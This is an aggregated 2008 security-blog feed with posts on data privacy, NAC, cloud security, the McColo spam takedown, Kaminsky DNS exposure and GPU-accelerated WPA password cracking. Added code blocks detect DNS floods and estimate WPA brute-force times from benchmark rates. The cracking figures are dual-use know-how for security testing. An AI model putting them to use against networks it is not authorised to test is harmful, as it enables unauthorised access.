Thursday, November 13, 2008

Spliced feed for Security Bloggers Network

Lumension gives away 1GB secured USB memory sticks [Malta Info Security]

Posted: 13 Nov 2008 12:37 PM CST

In an effort to make people more security conscious (and to promote themselves) Lumension (formerly Securewave) are giving away 1GB Secured sticks. Simply play the flash game and identify 10 security risks among the employees, register and you're on your way to receive a free USB stick as well as being entered into a draw to win 1 of 3 Lumension software security suites - HP server included!

Put yourself to the test and go grab one ...

Express Scripts Offers $1million Reward for Cyber Extortionists [Darknet - The Darkside]

Posted: 13 Nov 2008 07:18 AM CST

This is an interesting story, I’ll be watching how it develops - it’s not often you see a bounty for online crimes and especially one as enticing as 1 million dollars! That’s a hell of a sum for nailing down some dodgy hackers who are running an extortion scam after a data leak. I really wonder where [...]

Read the full post at

SBN members are attending SC World Congress as press [StillSecure, After All These Years]

Posted: 13 Nov 2008 06:14 AM CST

This post is for my fellow bloggers in the Security Bloggers Network.  If you are planning on attending or would like to attend the SC Magazine World Congress this December at the Javits Center in NYC, you are eligible for a press pass.  The pass allows you to attend sessions and the exhibits for free, as well as more perks.

If you would like to apply for your press credentials please contact me at by Monday. Please include your SBN member blog URL to verify your membership. I am submitting the final list to the SC Mag folks Monday evening.

Also, for the analyst and mainstream media community we will be having a StillSecure cocktail hour.  If you would like an invite please contact me at as well.

It should be a great show and I hope to see many SBN members there.

An Information Security Place Podcast - Episode 9 [An Information Security Place]

Posted: 13 Nov 2008 05:57 AM CST

Link to MP3

Show notes:

Just Jim and I today talking about news and adding some ranting (as usual).

Segment 1: InfoSec News Update and various ranting

Segment 2:

  • Geek Toys - BlueAnt SuperTooth 3 Review
  • Consultants Corner - Importance of Physical Security
  • We bid you a fond farewell

Music Notes:

  • Intro/Outro - Digital Breaks - “Therapy”
  • Segue 1 - Naked Gun - “A.D.D.”
  • Zinger - JunkTones - “Welcome To the USA”
  • Segue 2 - Kickstart - “Bouncey”


When Did My Personal Information Become Your Property? [The Security Catalyst]

Posted: 13 Nov 2008 04:12 AM CST

A colleague recently asked me, “When did my personal information become someone else’s property?” It’s a vital question, because if my personal information belongs to someone else, then they can do whatever they want with it. If data is property, then they can buy, sell, license, or give away my identity without my consent. This puts me at risk, because I must rely on the good will of a third party to keep my identity secure.

But if personal information really were property, then I should be able to permanently sell, or “alienate,” it. But unfortunately, I can’t sell personal information like a car. If I sell my car and the new owner paints it purple or runs it into a tree, it’s not my problem. But we all know that if I sell my personal information and the new owner “crashes” my identity, I suffer. Unlike all forms of property, personal information is inherently inalienable. Unless you enter the witness protection program, you’re stuck with your identity no matter how many times you sell it, and no matter how many times it is crashed.

Data as Property

Intellectual Property law does not generally treat personal information as property. Most personal information, such as names, addresses, phone numbers, and social security numbers, are facts. Facts are not copyrightable. You can’t patent personal information, and it certainly isn’t a trade secret. In short, nobody “owns” my name, including myself. And if someone could “own” my name, it would most logically be my parents, since they created it. But my mom can’t copyright my date of birth, and the government can’t patent my social security number. My phone number is not an AT&T trade secret, nor is it mine.

However, data often behaves like property, and so it is treated as such. Like property, personal information has value. Entire multi-billion dollar industries thrive on the sale and exchange of personal information. Next, like any form of property, personal information in databases can be shared, sold, licensed, stolen, or lost with remarkable efficiency. And unfortunately, you don’t have any constitutional right of privacy when you give your personal data to a third party.

Some laws recognize that personal information has value. For example, United States election law requires candidates to disclose the value of all in-kind campaign donations, including databases of potential voters. Other federal and state statutes, such as the Gramm-Leach-Bliley Act and the Sarbanes-Oxley Act, require corporations to account for the fair market value of assets, which may include customer data. Even tort law says that some forms of privacy come from a trademark ownership of one’s name and likeness. And breach notification laws seem to assert that companies which collect personal information “own” it.

Data as Self

But that isn’t the whole story. Unlike every other form of property, you can’t alienate personal information (such as bank account numbers, credit scores, social security numbers, or police reports) even if a third party creates it. Personal information is different from property, since property is presumptively alienable.

In the Information Age, you are not much more than “an electronic collage of bits of information, a digital person composed in the collective computer networks of the world.” In other words, a person may now be defined as just a few pieces of data. This data is your Data Self. Your Data Self is a collection of your credit report, Facebook page, Google results, bank account numbers, archived e-mails, and an endless parade of other data. Your Data Self is a digital alter-ego, with its own personality, dispositions, fallacies and mortality. Your Data Self also has the power to enter contracts, grant access to your financial assets, have surgery, commit crimes, or be kidnapped.

When your Data Self belongs to someone else, it can be forced to act against your will. If someone makes your Data Self sign a contract, you are bound by it. If your Data Self is convicted of a crime, you can go to jail. If someone forces your Data Self to take out a loan, you must repay it. If your Data Self has an operation, you may no longer qualify for medical insurance. If your Data Self is abused, stolen, sold, manipulated, or forced to act against its will, you suffer the consequences. In this sense, “Identity Theft” might be more descriptively defined as “Digital Kidnapping.” Identity Theft is when someone pretends to be you by “kidnapping” your Data Self, doing something bad, and you get blamed.

Data IS Self

In my view, this is a startling development. As long as my Data Self is a third party’s possession, then they can also treat me like property. The now popular crime of Identity Theft is the most visible consequence of this trend. In fact, the very term “Identity Theft” epitomizes the clash between the Data as Property and Data as Self theories of personal information: First, you have an alter-ego digital “identity” or Data Self; and second, your Data Self is subject to theft and abuse, like property.

Fortunately, the 13th Amendment ended slavery, and human muscle, once required for agriculture and labor, does not command the same economic premium in a post-industrial society. Instead, a person’s economic value now lies in his access to financial assets and credit. Our Data Selves are easy to coerce, and we are now worth more in bytes than in flesh and blood. As long as Data Selves are digital property, new crimes similar to identity theft will continue to arise, and our society runs the sinister risk of a new form of human trafficking: A type of Digital Slavery, where third parties can own, abuse, and force Data Selves to act against their will.

Aaron Titus is the Privacy Director for the Liberty Coalition, and welcomes feedback.

1. 19 NO. 7 Intell. Prop. & Tech. L.J. 5, 8.
2. Feist Publications, Inc. v. Rural Telephone Service, 499 U.S. 340, 363-64, 111 S.Ct. 1282, 1297 (1991) (Holding that an alphabetized collection of personal facts in a phone book is not copyrightable because 1. Facts are not copyrightable, and 2. The phone book lacks minimally creative selection, coordination, and arrangement. “As a statutory matter, 17 U.S.C. § 101 does not afford protection from copying to a collection of facts that are selected, coordinated, and arranged in a way that utterly lacks originality.”)
3. 35 U.S.C.A. §§ 101-102.
4. Facts in a database may qualify for trade secret protection under state law, but only if the information meets stringent requirements, and remains secret. 19 NO. 7 Intell. Prop. & Tech. L.J. 5, 8.
5. Identity Theft Resource Center, Press Release - 2007 Breach List; Privacy Rights Clearinghouse, A Chronology of Data Breaches.
6. United States v. Miller, 425 U.S. 435, 443-44 (1976) (Holding that bank records have no fourth amendment protection, and are subject to government subpoena with no infringement of an individual’s rights).
7. 2 U.S.C.A § 431(8)(a).
8. “Tort” law is common- or judge-made law that allows people to sue others for doing bad things. For example, the tort of Appropriation of Name or Likeness is when someone uses a person’s name or picture for financial gain: Rest. 2d Torts § 652C cmt a. (1977) (The Tort of Appropriation of Likeness gives the individual “exclusive use of his own identity, in so far as it is represented by his name or likeness, and in so far as the use may be of benefit to him or to others. Although the protection of his personal feelings against mental distress is an important factor leading to a recognition of the rule, the right created by it is in the nature of a property right, for the exercise of which an exclusive license may be given to a third person, which will entitle the licensee to maintain an action to protect it.”).
9. See, e.g. Cal. Civ. Code § 1798.81.5(a).
10. Solove, Daniel J., The Digital Person. New York University Press, New York. 2004. p. 2

Links for 2008-11-12 [Sicurezza Informatica Made in Italy]

Posted: 13 Nov 2008 12:00 AM CST

These are the times of your life [StillSecure, After All These Years]

Posted: 12 Nov 2008 09:54 PM CST

I get so busy with work stuff, worrying about the economy, who will win an election, are we secure, that I sometimes forget what is really important.  What is really important is spending time with my family and watching my two little babies grow up to be boys.  I was reminded of that again tonight.  A friend gave us tickets to the Florida Panthers hockey game.  It was last minute and the two boys and I ate dinner, jumped in the car and headed down to the Bank Atlantic Center.

The Panthers do a great job putting on a show for the kids.  Though the arena is less than half full, they have all kinds of contests and other kid related promotions and activities.  My boys really enjoy going to Panther games.

I on the other hand really enjoy going to anything with my two sons.  It never fails that they do and say things that make me realize how fast they are growing up and how lucky I am to have them.  Tonight when they sang the Star Spangled Banner instead of having to tell them to stand, they both got right up.  My youngest son Bradley took off his hat and held it over his heart.  Watching this little 7 year old standing there at attention with his hat over his heart, singing the words to the National Anthem, I was pretty close to tears.

After this a commercial on the scoreboard talked about going to a local college and getting an education so that you "can go places".  My 9 year old son Landon looked at me and said, "Dad that is what I want to do, I want to go to college so I can be like you and go places."  I was so touched that he would want to be like me.  I had to explain to him that going places was more than just actually going to different places, but that there was another meaning to it.  I thought about it. I don't want him to have to go to different places, but I sure as heck hope that he does "go places".  But the simple way he said this which encompassed how he thinks about me was enough to make me realize how blessed I am to have these two boys.

So remember time marches on and the little ones don't stay little forever.  If you are lucky enough to have kids, cherish every day and moment you can spend with them.  Before you know it, they aren't little anymore.

Host of Internet Spam Groups is Cut Off [Vincent Arnold]

Posted: 12 Nov 2008 08:19 PM CST

Spam Drops After Internet Providers Disconnect a California Hosting Firm

By Brian Krebs Staff Writer
Wednesday, November 12, 2008; 7:16 PM

The volume of junk e-mail sent worldwide dropped drastically today after a Web hosting firm identified by the computer security community as a major host of organizations allegedly engaged in spam activity was taken offline, according to security firms that monitor spam distribution online.

While its gleaming, state-of-the-art, 30-story office tower in downtown San Jose, Calif., hardly looks like the staging ground for what could be called a full-scale cyber crime offensive, security experts have found that a relatively small firm at that location is home to servers that serve as a gateway for a significant portion of the world’s junk e-mail.

The servers are operated by McColo Corp., which these experts say has emerged as a major U.S. hosting service for international firms and syndicates that are involved in everything from the remote management of millions of compromised computers to the sale of counterfeit pharmaceuticals and designer goods, fake security products and child pornography via email.

But the company’s web site was not accessible today, when two Internet providers cut off McColo’s connectivity to the Internet, security experts said. Immediately after McColo was unplugged, security companies charted a precipitous drop in spam volumes worldwide. E-mail security firm IronPort said spam levels fell by roughly 66 percent as of Tuesday evening.

I prepare to depart Michigan with gifts for you [The Security Catalyst]

Posted: 12 Nov 2008 06:39 PM CST

After a great week in Michigan, tonight we pack up and prepare to head to Ohio tomorrow. Friday promises to be busy and exciting – and then on Saturday, we head to Maryland (Metro DC) for a week. Which brings me to the gifts I promised:

Join a conversation, get a free copy (hardcover) of Into the Breach

First – while in Maryland, I am attending CSI next week in support of the CompTIA Trustmark. It turns out that a chapter of Into the Breach examines how to evaluate, build and improve "third party trust" – what we need for success with our service providers and other vendors.

CompTIA Trustmark is hosting a handful of "catalyst conversations" to discuss my findings and examine how the industry handles this today, and what we can do in the future. This is not a sales pitch; rather, this is an opportunity to come together and work toward a common solution.

For those invited to attend, CompTIA will present you with your own copy of Into the Breach – which I will promptly autograph for you. Drop me an email – securitycatalyst (gmail) if you want to join us.

This leads me to my second offering…

Not going to CSI? Do you want to?

CSI was generous enough to share with me two ways for you to get involved:

* I can offer (I think) a free conference pass with full access – based on response. Here's the deal – share with me the biggest challenge you face in changing how people protect information. The best answer gets a signed copy of the book and a pass to the show (I'll hand you the book at the show).

* If you are already planning to attend, you can get 25% off your registration with code: BLOG25

I will do my best to both tweet (twitter id: catalyst) from CSI and report on interesting talks/findings from the floor. I will also be taking a limited number of vendor meetings to learn more about the products and solutions that make it easier for people to protect information. Shoot me a note if there is a product you want me to check out and report back on. 

Setting the record straight on NAC [StillSecure, After All These Years]

Posted: 12 Nov 2008 05:22 PM CST

Sometimes when you try to explain something you can't help but muddy the waters.  That is exactly what happened to Tim Greene in this article he wrote about endpoint based NAC in Network World. Hey I am not knocking Tim though. I get some of my best material from his column.  Anyway, in this week's adventure Tim is seeking to compare the pros and cons of endpoint based NAC to other types of NAC technologies.  He has the same old regular guest stars featured, Rob Whitley of Forrester, Ofir Arkin and a couple of special guest star NAC customers.  I am not going to regurgitate Tim's entire article.  Instead, let's go to the videotape for the facts.

Here is the background.  There are three types of NAC:

  1. Network or infrastructure based NAC - Like Cisco and Juniper and StillSecure, it uses the network switches and infrastructure to enforce and detect devices coming on the network
  2. Endpoint based NAC - an agent on the endpoint does the heavy lifting and the testing and enforcing.
  3. Appliance based NAC - sits on top of the network and usually uses some clever (or flaky) way of enforcing like ARP poisoning, TCP reset and the like.

Also, whether the NAC system is based on testing before or during a device logging on or just waiting until you see something bad is another way of separating the real deal from the pretenders in NAC.

So with that as a background here is what Tim wrote and what I say:

NAC products that enforce policies via Dynamic Host Configuration Protocol (DHCP) proxy servers do nothing to stop machines that obtain static IP addresses and don't use DHCP to make their network connections. That makes significant portions of corporate networks invisible to the NAC access control products, says Ofir Arkin . . .

Come on Tim that is so 2005.  I don't even think Ofir is pushing that crap anymore.  Yes spoofed and static IPs are a challenge, but not fatal.  There are many best practices to overcome this type of issue, not the least of which is an RDAC (remote device activity capture) or scan on connect module such as StillSecure Safe Access NAC has.  Also depending on your switch and DNS/DHCP vendor you can handle this problem that way as well.

The major downside to endpoint-enforced NAC is largely theoretical so far and one that customers seem willing to overlook. The problem is that rootkits can take over machines to make them lie about their health. This underlying endpoint problem can be mitigated by software that monitors behavior of machines to determine if they are acting badly. And lying endpoints haven't actually proven a problem for many customers.

Tim, the "theoretical" problem of trusting an endpoint to report on itself is more real than that. Ask Richard Stiennon if you have any questions.  In fact this is a reason why some people choose not to go endpoint based NAC.  However, that is not the major downside to endpoint based NAC.  The major downside is there is no guest access solution.  What do you do if the endpoint does not have the agent installed and you can't make them install the agent?  Saying that you then need a second type of NAC is not elegant as Rob Whitley says.  In fact it is downright ugly. When you consider that guest or unmanaged access is the biggest driver in NAC, that pretty much sinks the endpoint based NAC approach.

And finally:

To deal with this problem, McAfee, for instance, is adding enforcement of NAC policies based on behavior via its IPS appliance and next year via a dedicated NAC appliance.

Guys, if the only defense you have is IPS, that is fine, but let's not say that is an effective NAC solution for guests.  You are bound by what the IPS can detect and it takes a lot of IPS boxes usually.  Not a scalable model at all.  Of course you could wait for McAfee to resurrect the Lockdown appliances.  It didn't work before and it probably won't work now.

Now wouldn't it be great if there was one NAC solution that covered all of these bases from one management console? You bet.  If you are looking for one that does that let me know or check out StillSecure Safe Access!

Cloud Security Macro Layers

Posted: 12 Nov 2008 04:47 PM CST

There’s been a lot of discussion on cloud computing in the blogosphere and general press lately, and although I’ll probably hate myself for it, it’s time to jump in beyond some sophomoric (albeit really funny) humor.

Chris Hoff inspired this with his post on TCG IF-MAP; a framework/standard for exchanging network security objects and events. Its roots are in NAC (Network Access Control), although as Alan Shimel informs us, there’s been very little adoption to date.

Since cloud computing is a crappy marketing term that can mean pretty much whatever you want, I won’t dig into the various permutations here. For this post I’ll be focusing on distributed services (e.g., grid computing), online services, and SaaS. I won’t be examining “cloud filtering” and other network-only services.

Chris’s posting, and most of the ones I’ve seen, are heavily focused on network security concepts as they relate to the cloud. But if we look at cloud computing at the macro level, there are additional layers which are just as critical (in no particular order):

  • Network: The usual network security controls.
  • Service: Security around the exposed APIs and services.
  • User: Authentication, which in the cloud world needs to move to more adaptive authentication, rather than our current static username/password model.
  • Transaction: Security controls around individual transactions, via transaction authentication, adaptive authorization, and other approaches.
  • Data: Information-centric security controls for cloud based data. How’s that for buzzword bingo? Okay, this actually includes security controls for the back-end data, distributed data, and any content exchanged with the user.

Down the road we’ll dig into these in more detail, but any time we start distributing services and functionality over an open public network with no inherent security controls, we need to focus on the design issues and reduce design flaws as early as possible. We can’t just look at this as a network problem: our authentication, authorization, information, and service (layer 7) controls are likely even more important.

This gets me thinking it’s time to write a new framework, not that anyone will adopt it.

Risk Management presentation by Dr. Peter Tippett [Kees Leune]

Posted: 12 Nov 2008 02:18 PM CST

I attended a two-hour presentation by Dr. Peter Tippett of Verizon Business's Cybertrust group at the Grand Hyatt Hotel in New York City (nice!) today.

Dr. Tippett is on tour to let the world know about the data breach investigations report that his team put together and published earlier this year. At the very least, the presentation was entertaining, but there were even some interesting bits here and there.

Dr. Tippett is a scientist.

Assume that someone says: We need to patch one per day.

In Tippett's view, that is a hypothesis and a hypothesis needs to be tested to determine its validity. These tests can be performed either by analyzing data, or by conducting a controlled experiment.

In many cases, Tippett claims, testing a hypothesis (we need more of product X) will show that the marginal benefits of deploying more (of the same) technology do not outweigh the marginal costs. For example, patching once a day instead of once a month might be much more expensive than the costs that are averted by it. If that hypothesis is proven to be true, patching once per month instead of once per day would be a colossal waste of resources. The costs would not outweigh the benefits.

In an ideal risk-assessment scenario, sufficient data is available to estimate such a risk (defined as: likelihood ∙ impact) before a decision must be made, rather than in hindsight after a solution has been implemented.

Most organizations lack the body of experience to be able to compute these risks at all, or at least in a way that is statistically significant enough to be usable. Most organizations are unwilling (or unable) to design and execute an experiment and draw conclusions based on the outcome of those experiments.

These two observations are the death-blow for a formal risk management approach to information security.

Until sufficient reliable data becomes available (at reasonable costs), organizations will never be able to build their information security programs based on a formal risk management approach.

When such data does become available (and it is starting to), the IT security landscape will change. Until then, risk management will be predominantly something we talk about, rather than practice.

2008 Worldwide Infrastructure Security Report [Vincent Arnold]

Posted: 12 Nov 2008 12:35 PM CST

Growing financial pressures, unforeseen threats, and a volatile and rapidly changing business landscape — apt descriptions for both the world economy and this year's Worldwide Infrastructure Security Survey.

Arbor Networks once again has completed a survey of the largest ISPs and content providers around the world. Some 70 lead security engineers responded to 90 questions covering a spectrum of Internet backbone security threats and engineering challenges. This fourth annual survey covered the 12-month period from August 2007 through July 2008.

A copy of the full report is available at

VMware’s Biggest Threat isn’t Microsoft [ARCHIMEDIUS]

Posted: 12 Nov 2008 11:01 AM CST

VMware's biggest threat is virtualization-lite, or the confinement of the virtualization business case to hypervisor VLANS.  VMware needs to get enterprises to the bigger picture, the full realization of the benefits of virtualization in the data center, including VMotion.  Otherwise, deployments will only be limited to a subset of environments driven by novelty or perhaps [...]

Is search about to experience a riot [StillSecure, After All These Years]

Posted: 12 Nov 2008 10:48 AM CST

Alta Vista, Excite, Infoseek, Ask Jeeves - do any of these ring a bell?  The back alleys of Silicon Valley are littered with the corpses of search engines that couldn't. Google has beaten most of these names into the annals of history.  Only Yahoo and Microsoft (with their deep pockets) still put up some token resistance to the Borg-Google collective. Why? Do we like the Google color schemes?  Do the double "0s" get us?  Do we like the idea of advertiser based searching?  No, no and no.  We use Google because more than any other search engine out there, when we want to find something, Google finds it for us.  The algorithms and intelligence Google uses result in what we are looking for.  Forget Android, Google Apps, Google Maps and all of that other stuff, we use Google because their search renders the most relevant results.

Could there be a new player on the horizon that gives us more relevant results?  Could there be a "riot" in the search arena?  If you believe what the folks at OneRiot say, there very well could be. In an age of social networking, this is a social search engine.  OneRiot gives you search results not based upon how many links are there to that page.  The results you get are based upon the popularity of those pages as measured by people on the net.  This should result in links not to the Wikipedia page, but to pages that real people look at when looking for a particular keyword.  This could be the key to breaking out of the collective. To paraphrase what Jon Landau once said about Bruce Springsteen, I have seen the future of Internet search and its name is OneRiot.

Besides the search OneRiot plays on its social media roots and has some really great add-ons.  There are plug-ins for MySpace (why no Facebook guys?), Twitter, web slices for IE8, etc.  Check them out.  Also you can make their searches better by installing their pulse checker.

OneRiot is based in Boulder, CO and in full disclosure I have some friends who work there.  But don't let that hold you back.  Go check out OneRiot and see for yourself that there can be more to search than being another drone of the collective.

When The Carrot Doesn't Work, Try a Stick: VMware Joins PCI SSC... [Rational Survivability]

Posted: 12 Nov 2008 10:04 AM CST

I've made no secret of my displeasure with the PCI Security Standards Council's lack of initiative when it comes to addressing the challenges and issues associated with virtualization and PCI compliance.

My last post on the topic  brought to light an even more extreme example of the evolution of virtualization's mainstream adoption and focused on the implications that cloud computing brings to bear when addressing the PCI DSS.

I was disheartened to find that upon inquiring as to the status of the formation of and participation in a virtualization-specific special interest group (SIG), the SSC's email response to me was as follows:

On Oct 29, 2008, at 1:24 PM, PCI Participation wrote:

Hello Christofer,

Thank you for contacting the PCI Security Standards Council. At this
time, there is currently no Virtualization SIG.
The current SIGs are
Pre-Authorization and Wireless.

Please let us know if you are interested in either of those groups.

The PCI Security Standards Council

-----Original Message-----
From: Christofer Hoff []
Sent: Wednesday, October 29, 2008 12:58 PM
To: PCI Participation
Subject: Participation in the PCI DSS Virtualization SIG?

How does one get involved in the PCI DSS Virtualization SIG?


Christofer Hoff

The follow-on email to that said there were no firm plans to form a virtualization SIG. <SIGh>

So assuming that was the carrot approach, I'm happy to see that VMware has taken the route that only money, influence and business necessity can bring: the virtualization vendor 'stick.'  To wit (and a head-nod to David Marshall):

VMware is Joining PCI Security Standards Council as Participating Organization
VMware, the global leader in virtualization solutions from the desktop to the datacenter, announced today that it is joining the PCI Security Standards Council. As a participating organization, VMware will work with the council to evolve the PCI Data Security Standard (DSS) and other payment card data protection standards. This will help those VMware customers in the retail industry who are required to meet these standards to remain compliant while leveraging VMware virtualization. VMware has also launched the VMware Compliance Center Web site, an initiative to help educate merchants and auditors about how to achieve, maintain and demonstrate compliance in virtual environments to meet a number of industry standards, including the PCI DSS.

As a participating organization, VMware will now have access to the latest payment card security standards from the council, be able to provide feedback on the standards and become part of a growing community that now includes more than 500 organizations. In an era of increasingly sophisticated attacks on systems, adhering to the PCI DSS represents a significant aspect of an entity's protection against data criminals. By joining as a participating organization, VMware is adding its voice to the process.

"The PCI Security Standards Council is committed to helping everyone involved in the payment chain protect consumer payment data," said Bob Russo, general manager of the PCI Security Standards Council. "By participating in the standards setting process, VMware demonstrates it is playing an active part in this important end goal."

Let's see if this leads to the formation of a virtualization SIG or at least a timetable for when the DSS will be updated with virtualization-specific guidelines.   I'd like to see other virtualization vendors also become participating organizations in the PCI SSC.


1 In 4 DNS Servers Still Vulnerable? More Like 4 in 4 []

Posted: 12 Nov 2008 09:45 AM CST

I was reading this article over at NetworkWorld today on a study by a commercial DNS vendor that concluded 1 in 4 DNS servers is still vulnerable to the big Kaminsky vulnerability.

The problem is, the number is more like 4 in 4.

The new attack method that Dan discovered is only slowed by the updates everyone installed, it isn’t stopped. Now instead of taking seconds to minutes to compromise a DNS server, it can take hours.

Thus if you don’t put compensating security in place, and you’re a target worth hitting, the attacker will still succeed.

This is a case where IDS is your friend- you need to be watching for DNS traffic floods that will indicate you are under attack. There are also commercial DNS solutions you can use with active protections, but for some weird reason I hate the idea of paying for something that’s free, reliable, and widely available.
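As an added illustration of the "watch for DNS traffic floods" point (example code, not from the original post or from any IDS product): a small detector over a constructed, BIND-style query log that flags a single client asking for an unusual number of distinct names under one zone inside a short window, which is the shape of traffic the post says you should be alarming on. The log lines, the thresholds and the "last two labels" zone heuristic are assumptions made for the demo.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in a BIND-style query-log shape (not captured traffic).
# The first four lines are ordinary lookups; the rest are one client asking
# for many distinct, random-looking names under example.com within seconds.
SAMPLE_LOG = """\
12-Nov-2008 09:40:00.101 client 10.0.0.5#53412: query: www.example.net IN A
12-Nov-2008 09:40:00.230 client 10.0.0.7#41002: query: mail.example.net IN MX
12-Nov-2008 09:40:00.412 client 10.0.0.5#53413: query: www.example.com IN A
12-Nov-2008 09:40:00.690 client 10.0.0.8#40123: query: ntp.example.org IN A
12-Nov-2008 09:40:01.002 client 10.0.0.9#40001: query: k3f9a.example.com IN A
12-Nov-2008 09:40:01.210 client 10.0.0.9#40002: query: zq81m.example.com IN A
12-Nov-2008 09:40:01.455 client 10.0.0.9#40003: query: p0x2c.example.com IN A
12-Nov-2008 09:40:01.703 client 10.0.0.9#40004: query: r7t4n.example.com IN A
12-Nov-2008 09:40:02.010 client 10.0.0.9#40005: query: b2y6v.example.com IN A
12-Nov-2008 09:40:02.298 client 10.0.0.9#40006: query: m9w3d.example.com IN A
12-Nov-2008 09:40:02.517 client 10.0.0.9#40007: query: h5c8e.example.com IN A
12-Nov-2008 09:40:02.804 client 10.0.0.9#40008: query: j1l0s.example.com IN A
12-Nov-2008 09:40:03.066 client 10.0.0.9#40009: query: v4a7k.example.com IN A
12-Nov-2008 09:40:03.330 client 10.0.0.9#40010: query: x6n2q.example.com IN A
"""

LOG_RE = re.compile(
    r"^(?P<ts>\d{2}-\w{3}-\d{4} \d{2}:\d{2}:\d{2}\.\d{3}) client "
    r"(?P<src>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>\w+)$"
)


def parse_line(line):
    """Return (timestamp, source, qname, qtype) or None for unparsable lines."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%d-%b-%Y %H:%M:%S.%f")
    return ts, m["src"], m["qname"].lower().rstrip("."), m["qtype"]


def zone_of(qname, depth=2):
    """Crude zone heuristic (assumption): the last `depth` labels of the name."""
    return ".".join(qname.split(".")[-depth:])


def detect_floods(lines, window_seconds=10, distinct_threshold=8):
    """Flag (source, zone) pairs that query >= distinct_threshold different
    names under one zone within window_seconds. Thresholds are assumptions."""
    events = sorted(e for e in (parse_line(l) for l in lines) if e)
    recent = defaultdict(list)          # (src, zone) -> [(ts, qname), ...]
    flagged, alerts = set(), []
    for ts, src, qname, _ in events:
        key = (src, zone_of(qname))
        bucket = recent[key]
        bucket.append((ts, qname))
        # slide the window: drop entries older than window_seconds
        while (ts - bucket[0][0]).total_seconds() > window_seconds:
            bucket.pop(0)
        distinct = {q for _, q in bucket}
        if len(distinct) >= distinct_threshold and key not in flagged:
            flagged.add(key)   # one alert per (source, zone) per run
            alerts.append({"src": src, "zone": key[1],
                           "distinct_names": len(distinct),
                           "first_seen": bucket[0][0].isoformat(),
                           "last_seen": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in detect_floods(SAMPLE_LOG.splitlines()):
        print(alert)
```

The same loop works on a live tail of the query log; the thresholds are the part to tune against your own baseline, since a busy recursive resolver legitimately sees many distinct names per zone from a single forwarding client.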

On that note, I’m going to go listen to my XM Radio. The irony is not lost on me.

PCI News Flash! New SAQs for version 1.2! [Branden Williams' Security Convergence Blog]

Posted: 12 Nov 2008 07:34 AM CST

The PCI Security Standards Council released the new version of the Self Assessment Questionnaires yesterday, as well as a new Navigating PCI-DSS for version 1.2.


Graphics cards are for cracking [Errata Security]

Posted: 12 Nov 2008 05:11 AM CST

I finally got around to testing Elcomsoft's WPA password cracking. If you'll remember, Elcomsoft announced last month that they could use the graphic card to crack WPA passwords 100 times faster than with a normal processor. I found it's not 100 times faster, but the acceleration is significant enough that if you do WiFi pentesting, you should probably get a graphics card to speed this up.

I ran their software on a number of systems. A screen shot of the results is below:
The systems are:
  • "Core2Duo-GT260" is a nVidia GT260 GPU, w/ Core 2 Duo 3.0-GHz
  • "Core2Quad" is a Core 2 quad 2.4-GHz.
  • "EEE901" is an Intel Atom 1.6-GHz dual-threaded.
  • "MacBookAir" is using the nVidia 9400m GPU, w/ Core 2 Duo 1.86-GHz
  • "Pentium3-400MHz" is using Intel Pentium III 400MHz single core CPU

Using the nVidia GT260 graphics card, the system could test roughly 10-thousand password hashes-per-second. A cheap quad-core CPU can only do about 1-thousand password hashes-per-second. This is not the 100-fold speed-up promised, but it is an impressive 10-fold speed-up.

I tried out some other processors as well. Intel has shipped a new extremely-mobile processor (intended for cell-phones) called the "Atom". It has roughly a tenth the CPU power of the desktop processor.

I tested the MacBook Air. Its graphics accelerator is actually slower than the built-in processor. Its 9400m GPU only does 178 hashes-per-second, but the Core 2 Duo could do around 400 hashes-per-second.

Graphics cards work by having a lot of tiny/simple processors. Here is a breakdown of some typical processors:

In theory, the speed of the cracking software should correlate with the frequency multiplied by the number of cores. The card to get right now is probably the 9800 GX2. I just ordered one from Newegg for $274. It puts two chips together on a single card, which should make it faster (as well as cheaper) than the GT260. I spent another $200 to get a system to go around it.

Elcomsoft currently cannot handle different cards. Therefore, when cracking software on a MacBook Pro (which has a 9400m and a 9600m), you won't be able to use both simultaneously.
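To put the hashes-per-second figures above in context, here is an added example (not the post's or Elcomsoft's code) that derives the WPA/WPA2-PSK pairwise master key the way the standard does, with Python's hashlib.pbkdf2_hmac, and turns the rates quoted in the post into worst-case time-to-exhaust estimates for a given passphrase alphabet and length. The RATES table only restates the post's numbers; the alphabet and length parameters are assumptions chosen for the demo.

```python
import hashlib

# Hash rates quoted in the post (candidate passphrases per second), restated as constants.
RATES = {
    "GT260 GPU": 10_000,
    "Core 2 Quad": 1_000,
    "Core 2 Duo 1.86 GHz": 400,
    "9400m GPU": 178,
}


def wpa_pmk(ssid: str, passphrase: str) -> bytes:
    """Passphrase -> 256-bit pairwise master key as specified in IEEE 802.11i:
    PBKDF2-HMAC-SHA1, salt = SSID, 4096 iterations, 32-byte output."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), 4096, 32)


def sha1_calls_per_candidate() -> int:
    """Why the rates are so low: 32 bytes of output need two PBKDF2 blocks
    (SHA-1 yields 20), each block runs 4096 HMAC rounds, and each HMAC round
    costs roughly two SHA-1 compressions."""
    return 2 * 4096 * 2


def days_to_exhaust(alphabet_size: int, length: int, hashes_per_second: float) -> float:
    """Worst-case days to try every passphrase of `length` symbols from an
    alphabet of `alphabet_size`, at the given candidate rate."""
    return (alphabet_size ** length) / hashes_per_second / 86400.0


def exhaust_table(alphabet_size: int, length: int) -> dict:
    """Time-to-exhaust for every platform in RATES."""
    return {name: days_to_exhaust(alphabet_size, length, rate)
            for name, rate in RATES.items()}


if __name__ == "__main__":
    # Known-answer check from the 802.11i test vectors: SSID "IEEE", passphrase "password".
    print(wpa_pmk("IEEE", "password").hex())
    for alphabet, length, label in [(10, 8, "8 digits"),
                                    (26, 8, "8 lowercase letters"),
                                    (62, 10, "10 mixed-case alphanumerics")]:
        print(label, {k: round(v, 1) for k, v in exhaust_table(alphabet, length).items()})
```

The policy takeaway is the same one the post implies: a 10-fold speed-up moves an 8-character lowercase passphrase from years to months on one card, while adding two characters and mixed case pushes the worst case back out by orders of magnitude on any of these platforms.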

OWASP - VA Local Chapter Infosec Meetup Event - Thursday, 11-13: Web Security Testing []

Posted: 12 Nov 2008 12:23 AM CST

Here is some information regarding this week’s Thursday OWASP - VA Local Chapter infosec meetup event. If you plan on attending, RSVP to Jeremy Epstein (email available in their post - linked below) so they can get your badge processing started.

